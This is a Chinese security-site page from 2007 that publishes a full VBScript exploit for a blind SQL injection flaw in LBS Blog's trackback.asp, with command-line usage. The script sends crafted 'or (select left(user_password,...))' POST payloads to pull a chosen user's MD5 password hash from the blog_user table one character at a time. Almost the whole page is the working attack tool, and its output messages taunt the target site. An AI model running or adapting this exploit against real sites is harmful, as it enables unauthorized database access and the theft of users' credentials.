首页 新闻 文章 软件 动画 搜黑 编程 网校 网址 设计 视频 上传 图文 破解 专题 论坛 热门 虚拟主机 最近更新

 IDC 脚本注入 灰鸽子 DDOS攻击 QQ黑客 3389入侵 加壳脱壳 红客圈 黑页公布 防火墙 操作系统 代理IP 专杀工具 杀毒软件

 漏洞公布 病毒公告 业界动态 黑客新闻 黑客人物 杀毒防护 安全书籍 升级补丁 红客圈子
 入侵检测 漏洞研究 软件评测 操作系统 网管天地 黑客编程 安全防护 Q Q 技巧 防黑信封
 扫描检测 远程监控 脚本注入 拒绝攻击 嗅探监听 木马后门 字典代理 密码破解 黑客博客
 木马教程 脚本入侵 漏洞利用 加密破解 软件应用 安全配置 综合教程 Q Q 动画 网友上传
 Delphi编程 汇编编程 VB编程 VC/C++编程 PB编程 VFP编程 WEB编程 Exploite 数据库编程
国内超人气黑客论坛
定做软件 救援服务

综合 新闻 文章 软件 动画 编程 视频
·搜黑-全球首例黑客资讯搜索
·视频-国内视频学习教学大全
·设计-汇集百家设计网站精华
·编程-13大编程语言全面学习
安全中国首页 > 文章中心 > 漏洞研究
LBS Blog又一注射漏洞含漏洞解析和exp
http://www.anqn.com     时间:2007-7-11 1:48:33      责任编辑:沙磊      网友评论
热 点:

'============================================================================
'使用说明:
' 在命令提示符下:
' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 要破解的博客用户密码
'如:
' cscript.exe lbsblog.vbs www.xxxx.com/bbs/boke.asp admin
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP对象用来打开目标网址
Dim TargetURL '目标网址
Dim userid '博客用户名
Dim TempStr '存放已获取的部分 MD5密码
Dim CharHex '定义16进制字符
Dim charset

Set oArgs = WScript.arguments
If oArgs.count <> 2 Then Call ShowUsage()

Set olbsXML = createObject("Microsoft.XMLHTTP")

'补充完整目标网址
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & "trackback.asp"

userid=oArgs(1)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")

WScript.echo "LBS Blog All version Exploit[新的注射漏洞]"&vbcrlf
WScript.echo "By 剑心"&vbcrlf
WScript.echo "http://www.loveshell.net/ ~_~我真的够无聊的......"&vbcrlf&vbcrlf
WScript.echo "+Fuck the site now"&vbcrlf

Call main(TargetURL,BlogName)

Set oBokeXML = Nothing

'----------------------------------------------sub-------------------------------------------------------
'============================================
'函数名称:main
'函数功能:主程序,注入获得blog 用户密码
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
 postdata = ""
 postdata = "' or (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"' and '1'='1"
 
 OpenURL = TargetURL

olbsXML.open "Post",OpenURL, False, "", ""
 olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
olbsXML.send "url=http://www.loveshell.net/blog/&id=1&blog_name=loveshell_is_my_hero&excerpt=fuck" & escape(postdata)
GetPage = BytesToBstr(olbsXML.ResponseBody)
'判断访问的页面是否存在
 'WScript.echo GetPage
If InStr(GetPage,"Trackback is already saved")<>0 Then
TempStr=TempStr & CharHex(SubOffset)
WScript.Echo "+Crack now:"&TempStr &String(40-MainOffset, "?")
Exit For
ElseIf InStr(GetPage,"Trackback Disabled")<>0 Then
WScript.echo vbcrlf & "Something error,Not vul" & vbcrlf
WScript.Quit
End If
next
Next
WScript.Echo vbcrlf& "+We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
End sub

'============================================
'函数名称:BytesToBstr
'函数功能:将XMLHTTP对象中的内容转化为GB2312编码
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("ADODB.Stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function

'============================
'函数名称:ShowUsage
'函数功能:使用方法提示
'============================
Sub ShowUsage()
WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/剑心"
WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL userid"
WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.net/ 1"
WScript.echo ""
WScript.Quit
End Sub

上一页 1 2 

·上一篇: 提升权限 把无法删除的病毒扫地出门
·下一篇: 在我看来,BBSXP2007很多注入点

发表评论  打印本文  返回顶部  关闭窗口
最新5条评论 条评论
条评论
名称: 信箱:

相关连接
·OBLOG4.5 商业SQL版 漏洞解析 [2007-7-11]
·LBS blog sql注射漏洞[All version] [2007-6-30]
·菜鸟批量入侵Oblog博客系统 [2007-4-24]
·Google官方上周末Blog被黑 发布虚假消息 [2006-10-30]
·使用网上常见Blog的方法演示(以sohu为例) [2006-10-26]
·Google官方上周末Blog被黑 发布虚假消息 [2006-10-10]
·Cat的blog:暴酷入侵OBLOG全过程 [2006-9-20]
·探讨关于bo-blog的安全隐患 [2006-9-19]
·Oblog3.0漏洞攻击测试实例 [2006-8-21]
·Cat的blog:暴库入侵Oblog [2006-8-8]